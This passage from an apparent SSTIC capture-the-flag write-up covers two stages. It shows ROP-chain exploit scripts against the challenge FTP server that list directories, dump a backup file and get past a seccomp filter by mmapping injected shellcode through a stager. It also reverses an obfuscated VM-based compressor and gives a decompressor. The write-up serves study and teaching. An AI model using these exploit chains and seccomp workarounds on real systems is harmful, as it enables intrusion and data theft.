- Integrate the "goodfs" file system to the FTP server
That’s it for stage 3!
Stage 4
It’s not completely clear where to go now, so I just decided to use the new-found ability to ROP to explore the filesystem. I made a simple “stager” ropchain that read a longer ropchain into memory, and used that to load a ropchain to call getdents64
on arbitrary directories. I also had the ropchain rerun the stager at the end, to enable interactivity. Here’s how that looks (lsdir.py
pop_rdi = libcbase + 0x0007a307
pop_rsi = libcbase + 0x0007a0ff
pop_rdx_rcx_rbx = libcbase + 0x001025ad
mov_rdx_rax = libcbase + 0x000425cf
pop_rsp = libcbase + 0x00054d0d
ropspace = heapbase + 0x10000
dataspace = heapbase + 0x18000
inc_rax = libcbase + 0x000cfb20
# fds: 0=stdin, 1=stdout, 2=stderr, 3=serial_port, 4=server_sock, 5=client_sock, 6=dbg
roploop = [
# read(5, ropspace, 0x8000)
pop_rdi, 5,
pop_rsi, ropspace,
pop_rdx_rcx_rbx, 0x8000, 0, 0,
exebase + 0x21c0,
# pop rsp
pop_rsp, ropspace
payload = flat(roploop) + b"perms=63&user=x"
sig = sign(payload)
payload = payload.replace(b"\0", b"\n") + b"&sig=%d&" % sig
payload = payload.ljust(0x208, b"X")
assert len(payload) == 0x208
payload = payload + p64(0x41) + struct.pack("<QQQQQQ", 1, 0xff, certaddr, 0, signptr(pop_rdi), 0)
send_cmd("CERT", base64.b64encode(payload), reply=False)
class DirEntry:
inode: int
offset: int
ftype: int
name: str
def getdents(dirname):
ropdata = b""
offset = 0x200
def add_data(x):
nonlocal ropdata
addr = ropspace + offset + len(ropdata)
ropdata += x
return addr
rop = [
# open(dirname, O_DIRECTORY)
pop_rdi, add_data(dirname.encode() + b"\0"),
pop_rsi, 0o0200000,
exebase + 0x22d0,
# rax = getdents64(7, dataspace, 0x8000)
pop_rdi, 7,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, 0x8000, 0, 0,
libcbase + 0xde2d0,
# write(5, dataspace, rax+1)
pop_rdi, 5,
pop_rsi, dataspace,
exebase + 0x20c0,
# write(5, "__END_DATA__", 12)
pop_rdi, 5,
pop_rsi, add_data(b"__END_DATA__"),
pop_rdx_rcx_rbx, 12, 0, 0,
exebase + 0x20c0,
# close(7)
pop_rdi, 7,
exebase + 0x2190,
] + roploop
rop = flat(rop).ljust(offset, b"\0")
assert len(rop) == offset
rop += ropdata
res = s.recvuntil(b"__END_DATA__", drop=True)
recs = []
ptr = 0
while ptr < len(res) - 1:
d_ino, d_off, d_reclen, d_type = struct.unpack_from("<QqHB", res, ptr)
d_name = res[ptr+19:ptr+d_reclen].split(b"\0")[0].decode("latin1")
recs.append(DirEntry(d_ino, d_off, d_type, d_name))
ptr += d_reclen
return recs
def dump_rec(dir, indent=0):
recs = getdents(dir)
for rec in recs:
print(f"{' '*indent}{rec.name} type={rec.ftype} inode={rec.inode}")
if rec.ftype == 4 and rec.name not in (".", ".."):
dump_rec(f"{dir}/{rec.name}", indent + 1)
This produces the following output:
. type=4 inode=14
.. type=4 inode=1
sstic type=4 inode=15
. type=4 inode=15
.. type=4 inode=14
ftp.log type=8 inode=385
sensitive type=4 inode=19
. type=4 inode=19
.. type=4 inode=15
m00n.txt type=8 inode=22
home_backup.tar.zz type=8 inode=21
zz type=8 inode=20
info.txt type=8 inode=18
server type=8 inode=17
secret.txt type=8 inode=16
Ah, there’s a file home_backup.tar.zz
which isn’t in the release package we received. So, I wrote another “ROP loop” to dump the file (getfile.py
class Data:
data: bytes
def send_rop(rop):
ropdata = b""
flat_roploop = flat(roploop)
offset = 0x200
def add_data(x):
nonlocal ropdata
if isinstance(x, Data):
addr = ropspace + offset + len(ropdata)
ropdata += x.data
return addr
return x
rop = flat(rop, preprocessor=add_data)
maxlen = offset - len(flat_roploop)
assert len(rop) <= maxlen, "increase offset to at least %d" % (len(rop) + len(flat_roploop))
while len(rop) < maxlen:
# ret
rop += p64(libcbase + 0x0007602d)
rop += flat_roploop + ropdata
outf = open("home_backup.tar.zz", "ab")
cursize = outf.tell()
# open(filename, O_RDONLY)
pop_rdi, Data(b"sensitive/home_backup.tar.zz\0"),
pop_rsi, 0,
exebase + 0x22d0,
# fstat(7, dataspace)
pop_rdi, 7,
pop_rsi, dataspace,
exebase + 0x56d0,
# lseek(7, pos, 0)
pop_rdi, 7,
pop_rsi, cursize,
pop_rdx_rcx_rbx, 0, 0, 0,
libcbase + 0x000000000010e130,
# write(5, dataspace, rax+1)
pop_rdi, 5,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, 0x90, 0, 0,
exebase + 0x20c0,
# write(5, "__END_DATA__", 12)
pop_rdi, 5,
pop_rsi, Data(b"__END_DATA__"),
pop_rdx_rcx_rbx, 12, 0, 0,
exebase + 0x20c0,
stat = s.recvuntil(b"__END_DATA__", drop=True)
log.info("stat: %s", stat.hex())
size, = struct.unpack_from("<Q", stat, 0x30)
log.info("filesize: %d", size)
while 1:
chunksize = min(0x10000, size - outf.tell())
# read(7, dataspace, chunksize)
pop_rdi, 7,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, chunksize, 0, 0,
exebase + 0x21c0,
# write(5, dataspace, chunksize)
pop_rdi, 5,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, chunksize, 0, 0,
exebase + 0x20c0,
# write(5, "__END_DATA__", 12)
pop_rdi, 5,
pop_rsi, Data(b"__END_DATA__"),
pop_rdx_rcx_rbx, 12, 0, 0,
exebase + 0x20c0,
res = s.recvuntil(b"__END_DATA__", drop=True)
if not res:
log.info("%d bytes", len(res))
For whatever reason, this would keep breaking after four iterations (262144 bytes), so I had to run it several times to get the whole file (home_backup.tar.zz
Reversing zz
The home_backup.tar.zz
file is clearly compressed with the mystery zz
program from /home/sstic/sensitive
. This program asks for a single filename and compresses it to <filename>.zz
. We can, for example, compress a file with a single x
character to get the following compressed file:
00000000: 1600 0001 0000 0400 0000 7800 0001 0000 ..........x.....
00000010: 0040 0000 0000 0000 00 .@.......
Let’s reverse the zz
binary to see how it compresses files. First, the program executes a setup function at 0x1225 from .init_array
, which allocates some memory at 0x11100000:
- 0x11100000 for 0x1000 bytes: RW memory, uninitialized
- 0x1111a000 for 0x1000 bytes: RW memory, copied from 0x10697
- 0x11111000 for 0x8000 bytes: RX memory, copied from 0x9250, with 0x3d bytes at 0x11118fc3 copied from 0x16c9
Then, the entrypoint at 0x1140 calls __libc_start_main
, which calls main
at 0x1379. Strangely, this function allocates a 0x4000 block of memory at 0xff550000, and then sets RSP to 0xff553ef8, pivoting the stack to this new chunk of memory. It pushes the old RSP, and restores it before returning.
Besides the weird stack pivot, main
is otherwise pretty straightforward: it opens the file from the first argument, allocates a big block of memory at 0x20000 which is sized based on the input file, reads the entire file into the memory block, and calls the function at 0x2d4c. Upon returning from that function, it opens the .zz
file and writes data from the memory block into that file, then quits.
The function 0x2d4c implements the entire compression algorithm. This function behaves very strangely. Here are the first few instructions:
2d4c: lea rax, 0x1338c
push rax
call 5dd9
5dd9: push rbp
sub rsp, 0x40
mov rbp, rsp
jmp 7e44
7e44: mov [rbp], edi
mov [rbp+4], esi
mov [rbp+8], edx
mov [rbp+0xc], ecx
jmp 4078
4078: mov [rbp+0x10], r8d
mov rsi, [rsp+0x50]
mov ecx, rsp
mov [rbp+0x38], ecx
jmp 79b6
79b6: sub esp, 0x100
mov [rbp+0x28], esp
mov edi, [rsi]
lea rdx, [entry]
add rdx, rdi
jmp rdx
The code here is basically jumping between small “islands” of valid code interspersed with long sequences of meaningless bytes – it’s obfuscated.
This code first makes room for 16 DWORDs on the stack at 0x5dd9 and stores the function’s arguments to this space. It then allocates an additional 256 bytes of stack memory, then loads a DWORD from rsi = 0x1338c, offsets it by the address to the program entrypoint, and jumps to the resulting address. Note the use of a 32-bit esp
register – this explains why the stack was pivoted to a 32-bit safe address.
The DWORD that is loaded is 0x4c29, making the resulting jump address 0x5d69. At this address, we find the following code:
5d69: add rsi, 0x4
xor rcx, rcx
mov cl, [rsi]
jmp 8d7c
8d7c: add rsi, 0x1
xor rbx, rbx
mov bl, [rsi]
add rsi, 0x1
jmp 3d61
3d61: xor rdx, rdx
mov dl, [rsi]
add rsi, 0x1
mov ebx, [rbp+rbx*4]
jmp 5385
5385: mov ecx, [rbp+rcx*4]
shl rdx, 2
add rbx, rdx
mov [rbx], ecx
jmp 47f1
47f1: mov edi, [rsi]
lea rdx, [entry]
add rdx, rdi
jmp rdx
This advances rsi by 4 (skipping the DWORD that was loaded earlier), then loads the next three bytes as cl, bl and dl. These three bytes (which are 0, 10 and 12 at 0x13390) are then used to index rbp
as follows:
ebx = [rbp+bl*4]
ecx = [rbp+cl*4]
[rbx+dl*4] = ecx
It then reads the next DWORD from rsi
, offsets that by the entrypoint, and jumps to that new address.
This is, in fact, a virtual machine. rbp points to an array of 16 32-bit registers, while rsp points to a “memory” region of 0x100 bytes. rsi corresponds to the virtual machine’s program counter. The VMs registers are initialized as follows: r0-r4 are initialized to the first five arguments to function 0x2d4c, r10 is initialized to point at the base of the 0x100-byte memory region, and r14 is initialized to point to the end of this region (also to the base of the register array).
Opcodes are encoded as the relative program address of their opcode handlers (e.g. the “opcode” 0x4c29 is handled by code at 0x4c29 + 0x1140 = 0x5d69), with each handler tail calling the next handler. Under this interpretation, the opcode 0x4c29 is basically just doing the following: mov dword [rB + D*4], rC
, where rB
and rC
are VM registers and D
is a constant operand.
To tackle this VM, I wrote a VM disassembler which uses Capstone to automatically follow and disassemble the handlers for unknown opcodes. I would read the disassembled handler code, implement the opcode in the VM disassembler, and rerun the disassembler to see the next unknown opcode’s handler – rinse and repeat until all instructions are disassembled.
Here’s my disassembler script, zzdisas.py
# Automatically extract instructions from the weird machine
from capstone import *
from struct import unpack_from, calcsize
md = Cs(CS_ARCH_X86, CS_MODE_64)
f = open("zz", "rb")
prog = f.read()
def disas_op_impl(opaddr):
rip = opaddr + 0x1140
seen = set()
while 1:
if rip in seen: break
for i in md.disasm(prog[rip:], rip):
print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
if i.mnemonic == "jmp":
if i.op_str == "rdx":
rip = int(i.op_str, 0)
# - 0x1000 for file offset
#pc = 0x1338c
#pc = 0x13527 # from sub_0x2e9c
pc = 0x130c0 # from sub_0x2ccc
def rd(fmt):
global pc
res = unpack_from("<" + fmt, prog, pc - 0x1000)
pc += calcsize("<" + fmt)
return res
# rN = dword [ebp+N*4]
# r0..r4 = function arguments
# r10 = esp (0x100 space)
while 1:
print(f"{pc:05x}:", end=" ")
opcode, = rd("I")
if opcode == 0x4c29:
c, b, d = rd("BBB")
print(f"[r{b}+{4*d}] = r{c}")
elif opcode == 0x4ee7:
c, b, d = rd("BBB")
print(f"r{c} = [r{b}+{4*d}]")
elif opcode == 0x6718:
c, x = rd("BI")
print(f"r{c} = {x:#x}")
elif opcode == 0x634f:
off, = rd("h")
print(f"goto {pc+off:05x}")
elif opcode == 0x4f23:
c, b, d = rd("BBB")
print(f"r{c} = r{b} < r{d}")
elif opcode == 0x2e59:
d, off = rd("BH")
print(f"if r{d} == 0: goto {pc+off:05x}")
elif opcode == 0x7153:
c, b, d = rd("BBB")
print(f"r{c} = r{b} - r{d}")
elif opcode == 0x67b8:
c, = rd("B")
print(f"r14 = r14 - {4*c}")
elif opcode == 0x68c5:
imm, = rd("i")
print(f"r0 = sub_{imm+0x1140:#x}(r0, r1, r2, r3, r4)")
elif opcode == 0x4327:
c, b, d = rd("BBB")
print(f"r{c} = r{b} + {4*d}")
elif opcode == 0x5299:
c, b, d = rd("BBB")
if d == 255:
print(f"r{c} = r{b}")
print(f"r{c} = r{b} + r{d}")
elif opcode == 0x4cf5:
print("return r0")
elif opcode == 0x5444:
c, b, d = rd("BBB")
print(f"r{c} = [r{b}+r{d}]")
elif opcode == 0x769b:
c, b, d = rd("BBB")
print(f"r{c} = [r{b}+r{d}*4]")
elif opcode == 0x5727:
d, off = rd("BH")
print(f"if r{d} != 0: goto {pc+off:05x}")
This produces readable VM disassembly that looks like this:
1338c: [r10+48] = r0
13393: [r10+44] = r1
1339a: [r10+40] = r2
133a1: [r10+36] = r3
133a8: r0 = [r10+36]
133af: [r10+32] = r0
133b6: r0 = 0x10000
133bf: [r10+28] = r0
133c6: r0 = 0x0
133cf: [r10+24] = r0
133d6: goto 133dc
133dc: r0 = [r10+24]
133e3: r1 = [r10+40]
133ea: r0 = r0 < r1
133f1: if r0 == 0: goto 1350c
133f8: goto 133fe
133fe: r0 = [r10+28]
13405: r1 = [r10+40]
1340c: r2 = [r10+24]
13413: r1 = r1 - r2
1341a: r14 = r14 - 4
1341f: r0 = sub_0x28fa(r0, r1, r2, r3, r4)
13427: r14 = r14 + 4
1342e: [r10+20] = r0
13435: r0 = [r10+36]
1343c: [r10+16] = r0
13443: r0 = [r10+36]
1344a: r1 = 0x3
13453: r0 = r0 + r1
1345a: [r10+36] = r0
13461: r0 = [r10+48]
13468: r1 = [r10+44]
1346f: r2 = [r10+24]
13476: r3 = [r10+20]
1347d: r3 = r2 + r3
13484: r4 = [r10+36]
1348b: r14 = r14 - 4
13490: r0 = sub_0x2e9c(r0, r1, r2, r3, r4)
13498: r14 = r14 + 4
1349f: [r10+12] = r0
134a6: r0 = [r10+16]
134ad: r1 = [r10+12]
134b4: r14 = r14 - 4
134b9: r0 = sub_0x1a57(r0, r1, r2, r3, r4)
134c1: r14 = r14 + 4
134c8: r0 = [r10+12]
134cf: r1 = [r10+36]
134d6: r0 = r1 + r0
134dd: [r10+36] = r0
134e4: goto 134ea
134ea: r0 = [r10+28]
134f1: r1 = [r10+24]
134f8: r0 = r1 + r0
134ff: [r10+24] = r0
13506: goto 133dc
1350c: r0 = [r10+36]
13513: r1 = [r10+32]
1351a: r0 = r0 - r1
13521: return r0
Here, r10
acts like the rbp
register, providing access to the 0x100-byte chunk of memory allocated earlier, so we can treat [r10+X]
memory references as “stack” variables. By giving these variables useful names, and simplifying some instruction sequences (e.g. r0 = [r10+28]; r1 = [r10+24]; r0 = r1 + r0; [r10+24] = r0
becomes simply [r10+24] += [r10+28]
), we wind up with code that looks like this:
1338c: state = r0
13393: fileptr = r1
1339a: filesize = r2
133a1: outptr = r3
133a8: outbase = outptr
133b6: chunksize = 0x10000
133c6: filepos = 0x0
133d6: goto 133dc
133dc: if filepos >= filesize: goto 1350c
1341a: [r10+20] = min(chunksize, filesize - filepos) # sub_0x28fa
13435: lenptr = outptr
13443: outptr = outptr + 3
13461: r0 = state
13468: r1 = fileptr
1346f: r2 = filepos
13476: r3 = r2 + [r10+20]
13484: r4 = outptr
1348b: r14 = r14 - 4
13490: res = vmcall 13527(r0, r1, r2, r3, r4) # sub_0x2e9c
13498: r14 = r14 + 4
134a6: write24(lenptr, res) # sub_0x1a57
134c8: outptr += res
134ff: filepos += chunksize
13506: goto 133dc
1350c: return outptr - outbase
This VM function calls three other functions from the zz
binary. sub_0x28fa
and sub_0x1a57
are plain C functions: sub_0x28fa
calculates the minimum of its two integer arguments, and sub_0x1a57
writes a little-endian 24-bit integer to the given memory location. sub_0x2e9c
, on the other hand, does this:
lea rax, 0x13527
push rax
call 5dd9
That is, this function is another VM function: it loads a different VM program and executes it using the same VM interpreter at 0x5dd9. So, we have to reverse that one too.
The main
VM function takes the input data 65536 bytes at a time and feeds each chunk to the sub_0x2e9c
VM function (compress_chunk
), which compresses that chunk and writes that to the output. compress_chunk
calls a number of functions; the main ones are tagged s01
through s07
in the VM disassembly. These functions operate on the shared compressor state, and perform the bulk of the compression logic.
and s02
locate matches within the text – subsequent identical runs of text that will be compressed into a (distance, length, literal length) tuple referencing the earlier match. This is a typical dictionary coder approach as used by the Lempel-Ziv family of compression codecs (e.g. the widely-used Zlib). A hash table is used to efficiently identify matches. s03
, s04
, s05
and s06
use a Huffman coding scheme to compress the literal characters that aren’t represented by any matches – s03
initializes the tables, s04
accumulates frequency counts for every literal, s05
processes the frequency counts into Huffman codes by using a heap data structure, and s06
writes literal codes to the output based on the computed Huffman tree.
For example, here’s Ghidra’s decompilation for s05
void s05_freq_process(state *s)
undefined8 uVar1;
heap_node *left;
heap_node *right;
heap_node *new_node;
long lVar2;
undefined8 *puVar3;
heap_root heap;
uint binptrs [256];
int local_14;
int i;
int nbins;
puVar3 = (undefined8 *)binptrs;
for (lVar2 = 0x80; lVar2 != 0; lVar2 += -1) {
*puVar3 = 0;
puVar3 = puVar3 + 1;
nbins = 0;
// compact by removing zero bins
for (i = 0; i < s->huffman_nsyms; i += 1) {
if (s->huffman_freq_heap[i].count_or_depth != 0) {
uVar1 = *(undefined8 *)&s->huffman_freq_heap[i].left;
*(undefined8 *)(s->huffman_freq_heap + nbins) = *(undefined8 *)(s->huffman_freq_heap + i);
*(undefined8 *)&s->huffman_freq_heap[nbins].left = uVar1;
binptrs[nbins] = (int)s + (nbins + 1) * 0x10;
nbins += 1;
heap._0_8_ = 0;
heap.count2 = 0;
heap_create(&heap,(int *)binptrs,nbins);
for (local_14 = nbins; 1 < local_14; local_14 += -1) {
left = heap_pop(&heap);
right = heap_pop(&heap);
new_node = s->huffman_freq_heap + (local_14 + nbins);
new_node->count_or_depth = left->count_or_depth + right->count_or_depth;
new_node->value = -1;
new_node->left = (int)left;
new_node->right = (int)right;
heap_set_depth((heap_node *)(ulong)binptrs[0],(uint)(nbins == 1));
From reversing these C functions, we can infer that the compressor state shared by most functions is stored in a large C structure that looks like this (note that all pointers are 32 bits in size):
struct state {
/* Output bitstream state */
byte *out_base;
byte *out_ptr;
uint out_bitaccum;
int out_bitpos;
/* Huffman coding state */
struct heap_node {
int count_or_depth;
int value;
heap_node *left;
heap_node *right;
} huffman_freq_heap[512];
byte huffman_lengths[256];
int huffman_codes[256];
/* Match hash table */
uint htbl_size;
uint htbl_mask;
int *htbl_table;
int *htbl_chain;
/* General state */
int huffman_nsyms;
int match_count;
int literals_count;
byte literals[65536];
int match_offsets[16384];
int match_lengths[16384];
int match_literals[16384];
The VM code basically functions as a “driver” which calls the various C functions to do the real work. So, by reading the VM code, we can determine the structure of the output file. We already reversed the storage of literals (s03
to s06
). Three more functions called by compress_chunk
, 0x2926, 0x2ccc and 0x2974, are passed the match literals, match offsets and match lengths respectively, and are presumably responsible for writing those to the file.
0x2974 is a normal C function which also calls s03
through s06
, so we know the match lengths are encoded using another Huffman tree scheme. A total of 32 symbols are defined; the first 16 codes mean lengths of 0-15 bytes respectively, while codes 16-31 indicate ranges of lengths (e.g. code 16 means lengths 16-31, code 17 means lengths 32-63, etc.). When encoded as Huffman codes, additional bits are appended if the code indicates a range of values (so, e.g. the code for 17 would be followed by 5 additional bits which would be added to 32 to yield the exact match length).
0x2ccc is another VM function (match_offsets
), and reversing it shows the same calls to s03
to s06
, so the match offsets are encoded using yet another Huffman tree with a similar range-encoding scheme (codes 0, 1 are exact offsets, codes 2-31 are power-of-two match ranges).
The 32-bit Surprise
0x2926, however, is not like the other functions called by the VM code. 0x2926 calls the function located at 0x11118fc3, which was copied by the .init_array
code. This function does the following:
push rbx
push rbp
mov rbp, rsp
sub rsp, 0x18
mov rbx, rsp
lea rax, 0x11118fee
mov [rbx], rax
mov rax, 0x23
mov [rbx+4], eax
mov r13, rbp
call far [rbx]
mov rbp, r13
pop rbx
This code invokes the call far
instruction, which performs a segment change before calling a particular address. In this case, the new segment, 0x23, specifies a 32-bit operating mode – this is an example of the “Heaven’s Gate” technique, in which 64-bit code calls 32-bit code. This is the real reason why the stack and the compression state structure were allocated at 32-bit-safe addresses.
The 32-bit code does the following:
push 0x2b
pop ds
push 0x2b
pop es
call edi
This sets up the correct segment registers to run normal 32-bit code. The actual function called is taken from the 64-bit function’s argument (edi
), which is 0x1111247b in this case.
The 32-bit code at 0x1111247b looks like this:
247b: lea eax, [a12a]
push eax
call 7d66
7d66: push ebp
sub esp, 0x40
mov ebp, esp
mov eax, [esp+0x50]
mov [ebp], eax
mov eax, [esp+0x54]
jmp 51cf
51cf: mov [ebp+4], eax
mov eax, [esp+0x58]
mov [ebp+8], eax
mov eax, [esp+0x5c]
mov [ebp+12], eax
mov eax, [esp+0x60]
mov [ebp+16], eax
jmp 4b26
4b26: mov edi, [esp+0x48]
mov edx, esp
mov [ebp+0x38], edx
sub esp, 0x100
mov [ebp+0x28], esp
mov edx, [edi]
lea esi, [entry]
add esi, edx
jmp esi
This should look familiar – it’s another VM, but this time using 32-bit code as instruction handlers. So, a quick modification to zzdisas.py
produces the 32-bit version, zzdisas32.py
. This time, since we already understand most of the file format, we just need to disassemble enough of the 32-bit VM (zzdisas32.txt
) to understand how it’s encoding the match literals (which are what are being passed to this function). Unsurprisingly, it’s yet another Huffman tree, and we just need to know what the configuration is (number of codewords, mapping of codewords to literal counts).
The Decompressor
Finally, after reversing everything, we know the structure of the compressed file. It mainly consists of four encoded Huffman trees, with some 24-bit length/count fields interspersed. Each Huffman tree encodes a fixed number of possible symbols: 256 literal symbols, and 32 symbols each for the match offsets, match lengths, and match literal run lengths. Each tree starts with a description of the tree – the value and length for each symbol – followed by a packed bitstream of Huffman codes. Match offset, length, and literal length codes may each be followed by an additional sequence of bits to refine the value.
By reading each Huffman-encoded sequence, we can reconstruct all of the matches and literals, and then use that information to reconstruct the original input file. I wrote a script, unzz.py
, which performs the decompression:
from collections import defaultdict
import sys
class BitReader:
def __init__(self, data):
self.pos = 0
self.data = data
def __len__(self):
return len(self.data) * 8
def read(self, n):
val = 0
while n > 0:
bits = (self.data[self.pos >> 3] << (self.pos % 8)) & 0xff
take = min(n, 8 - (self.pos % 8))
val = (val << take) | (bits >> (8 - take))
n -= take
self.pos += take
return val
def read24(self):
assert self.pos % 8 == 0
a, b, c = self.data[self.pos >> 3:(self.pos >> 3) + 3]
self.pos += 24
return (a + (b << 8) + (c << 16))
def pad(self):
rem = self.pos % 8
if rem:
self.pos += 8 - rem
class HuffmanTables:
def __init__(self, reader, max_bins):
nbits = max_bins.bit_length() - 1
nbins = reader.read(nbits) + 1
bins = [(reader.read(nbits), reader.read(4) + 1) for _ in range(nbins)]
self.bins = bins
self.codes_by_length = defaultdict(dict)
self.min_length = 999
prevdepth = -1
code = 0
for val, depth in bins:
if prevdepth == depth:
code += 1
elif prevdepth != -1:
code = (code + 1) << (depth - prevdepth)
prevdepth = depth
self.min_length = min(depth, self.min_length)
self.codes_by_length[depth][code] = val
def read(self, reader):
length = self.min_length
code = reader.read(self.min_length)
while code not in self.codes_by_length[length]:
length += 1
code = (code << 1) + reader.read(1)
return self.codes_by_length[length][code]
def read_match_lit(huff, reader):
n = huff.read(reader)
if n < 0x10: return n
nbits = n - 0xc
return reader.read(nbits) | (1 << nbits)
def read_match_off(huff, reader):
n = huff.read(reader)
if n < 2: return n
nbits = n - 1
return reader.read(nbits) | (1 << nbits)
def read_match_len(huff, reader):
n = huff.read(reader)
if n < 0x10: return n
nbits = n - 0xc
return reader.read(nbits) | (1 << nbits)
r = BitReader(open(sys.argv[1], "rb").read())
outf = open(sys.argv[1].replace(".zz", ""), "wb")
while r.pos < len(r):
outblock = bytearray()
print("block at %d" % (r.pos // 8))
blocksize = r.read24()
blockstart = r.pos
num_literals = r.read24()
compressed_literals_len = r.read24()
startpos = r.pos
lit_huff = HuffmanTables(r, 0x100)
lits = bytes([lit_huff.read(r) for _ in range(num_literals)])
assert r.pos == startpos + compressed_literals_len * 8
num_matches = r.read24()
match_lit_huff = HuffmanTables(r, 0x20)
match_lits = [read_match_lit(match_lit_huff, r) for _ in range(num_matches)]
match_off_huff = HuffmanTables(r, 0x20)
match_offs = [read_match_off(match_off_huff, r) for _ in range(num_matches)]
match_len_huff = HuffmanTables(r, 0x20)
match_lens = [read_match_len(match_len_huff, r) for _ in range(num_matches)]
assert r.pos == blockstart + blocksize * 8
assert sum(match_lits) == num_literals
litpos = 0
for i in range(num_matches):
match_lit = match_lits[i]
match_off = match_offs[i]
match_len = match_lens[i]
outblock += lits[litpos:litpos+match_lit]
litpos += match_lit
if match_len:
m = outblock[-match_off:]
m = m * ((match_len + len(m) - 1) // len(m))
outblock += m[:match_len]
When run on home_backup.tar.zz
, this spits out a valid TAR archive home_backup.tar
. I extracted the contents of this archive to home_backup
. Inside, the notes.txt
file reads (translated):
I read FIORANELLI's paper and indeed we did well to have it retracted, a little
more and it would have been taken seriously and would have attracted the
attention of the general public...
Such information could have reduced the Organization to nothing...
There’s our flag for stage 4!
Stage 5
Inside home_backup
, we also find a .bash_history
file, which contains the following:
ls -la
cd /tmp
mounter_client mount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
cd /mnt/goodfs
From this, we obtain the password for mounting the goodfs, so now our goal is to explore this filesystem.
and mounter_server
are both very simple, unobfuscated programs. mounter_server
is launched by the init
script. It must be run as root. It retrieves the password from the HSM via function 0x04, which also clears the password from the EEPROM. mounter_server
double checks that the password is indeed cleared as a sanity check on the HSM.
connects /dev/sdb
to a loop block device (/dev/loop5
), then creates a world-writable file called /run/mount_shm
. It mmap
s this file and treats that memory region as containing the following structure:
struct mounter_shm {
int flag;
char password[256];
char command[256];
char arguments[256];
It then waits for flag
to be set to 1. When it is, mounter_server
uses malloc
to allocate a new buffer and memcpy
‘s the contents of mount_shm
into the buffer. It checks to see if the password is correct; if so, it calls a do_command
function with the command and arguments.
accepts only two command/argument pairs: mount goodfs
uses the mount
syscall to mount /dev/loop5
to /mnt/goodfs
using the goodfs
filesystem. umount goodfs
uses umount
to unmount /mnt/goodfs
. At the end, the result is logged using syslog
. Once the command is complete, the flag
will be set based on the result to either 2 (password valid) or 3 (password invalid).
is even simpler: it mmaps /run/mount_shm
, then copies the three command-line arguments (command, arguments, and password) into the mount_shm
structure and sets flag
to 1. It then waits for flag
to be not equal to 1, indicating command completion. Thus, using the mount_shm
IPC mechanism, any unprivileged user account can mount and unmount the goodfs filesystem.
However, we cannot use mounter_client
directly from the FTP server process because execve
is blocked. Thus, we will have to emulate the IPC mechanism ourselves inside the process. For this, we will want to run real code in that process instead of using ropchains.
Running Code in the FTP Server
The FTP server’s seccomp filter blocks execve. So, uploading a separate program and executing it will be out of the question. Instead, I decided to use the Shellcode Compiler from Binary Ninja to compile C code into portable machine code that can be directly injected into the process. The Shellcode Compiler produces compact, self-contained programs with support for functions like fprintf
in just a few KB of code.
The seccomp filter also prevents calling mmap
with a prot
argument greater than 5. Thus, we cannot use PROT_WRITE | PROT_EXEC
. To work around the mmap
limitation, I wrote the machine code into a temporary file, then mmap
ed that file as PROT_READ | PROT_EXEC
. The basic idea is to use a ropchain to call open("temp", O_RDWR, 0666)
, then read(5, buffer, 4096)
, write(tempfd, buffer, 4096)
, and finally mmap(NULL, 4096, PROT_READ | PROT_EXEC, MAP_SHARED, tempfd, 0)
. Here’s how that looks in the FTP server exploit (full exploit in run_shellcode.py
pop_rdi = libcbase + 0x0007a307
pop_rsi = libcbase + 0x0007a0ff
pop_rdx_rcx_rbx = libcbase + 0x001025ad
pop_rdx_r12 = libcbase + 0x00134c09
mov_rdx_rax = libcbase + 0x000425cf
pop_rsp = libcbase + 0x00054d0d
ropspace = heapbase + 0x10000
dataspace = heapbase + 0x11000
mov_rax_rdx = libcbase + 0x000b6b18
inc_rax = libcbase + 0x000cfb20
mov_r8d_eax = libcbase + 0x0011f807
mov_r9_rax_pop_r12_r13_r14 = libcbase + 0x0007a1a0
shellcode = open("stager", "rb").read()
# fds: 0=stdin, 1=stdout, 2=stderr, 3=serial_port, 4=server_sock, 5=client_sock, 6=dbg
rop = [
# open(filename, O_RDWR | O_CREAT, 0o666)
pop_rdi, exebase + 0x6354, # "listen"
pop_rsi, 0x42,
pop_rdx_rcx_rbx, 0o666, 0, 0,
exebase + 0x22d0,
# read(5, dataspace, len(shellcode))
pop_rdi, 5,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, len(shellcode), 0, 0,
exebase + 0x21c0,
# write(7, dataspace, len(shellcode))
pop_rdi, 7,
pop_rsi, dataspace,
pop_rdx_rcx_rbx, len(shellcode), 0, 0,
exebase + 0x20c0,
# mmap(NULL, len(shellcode), PROT_READ | PROT_EXEC, MAP_SHARED, 7, 0)
pop_rdx_r12, 7, 0, mov_rax_rdx, mov_r8d_eax,
pop_rdx_r12, 0, 0, mov_rax_rdx, mov_r9_rax_pop_r12_r13_r14, 0, 0, 0,
pop_rdx_rcx_rbx, 5, 1, 0,
pop_rdi, 0,
pop_rsi, (len(shellcode) + 4095) & ~0xfff,
libcbase + 0x1188f0,
# jmp rax
libcbase + 0x0007e051,
payload = flat(rop) + b"perms=63&user=x"
sig = sign(payload)
payload = payload.replace(b"\0", b"\n") + b"&sig=%d&" % sig
payload = payload.ljust(0x208, b"X")
assert len(payload) == 0x208
payload = payload + p64(0x41) + struct.pack("<QQQQQQ", 1, 0xff, certaddr, 0, signptr(pop_rdi), 0)
send_cmd("CERT", base64.b64encode(payload), reply=False)
sc = open("shellcode", "rb").read()
However, there’s a bit of a wrinkle: with sockets, read
can return early, and in testing it would frequently return after just a single TCP packet (so after ~1400 bytes). The seccomp filter blocks recv*
functions so we can’t use MSG_WAITALL
. As a workaround, I used Shellcode Compiler to build a tiny stager (stager.c
void readall(int fd, void *buf, int size) {
while(size > 0) {
int res = read(fd, buf, size);
if(res < 0) {
buf += res;
size -= res;
int main() {
char buf[65536];
int fd = open("lunatic", O_RDWR | O_CREAT, 0666);
write(5, "ready", 5);
int size;
readall(5, &size, 4);
readall(5, buf, size);
write(fd, buf, size);
void *code = mmap(NULL, (size + 4095) & ~0xfff, PROT_READ | PROT_EXEC, MAP_SHARED, fd, 0);
goto *code;
This stager compiles to just 312 bytes of x86-64 assembly (stager
). We inject it first using the ropchain, then send the stager the length of the final payload and the payload itself. With it, we can run a payload of arbitrary length. One of the earliest payloads I sent was to enumerate the filesystem (shellcode1.c
#define SOCKFD 5
#define SOCK fdopen(SOCKFD)
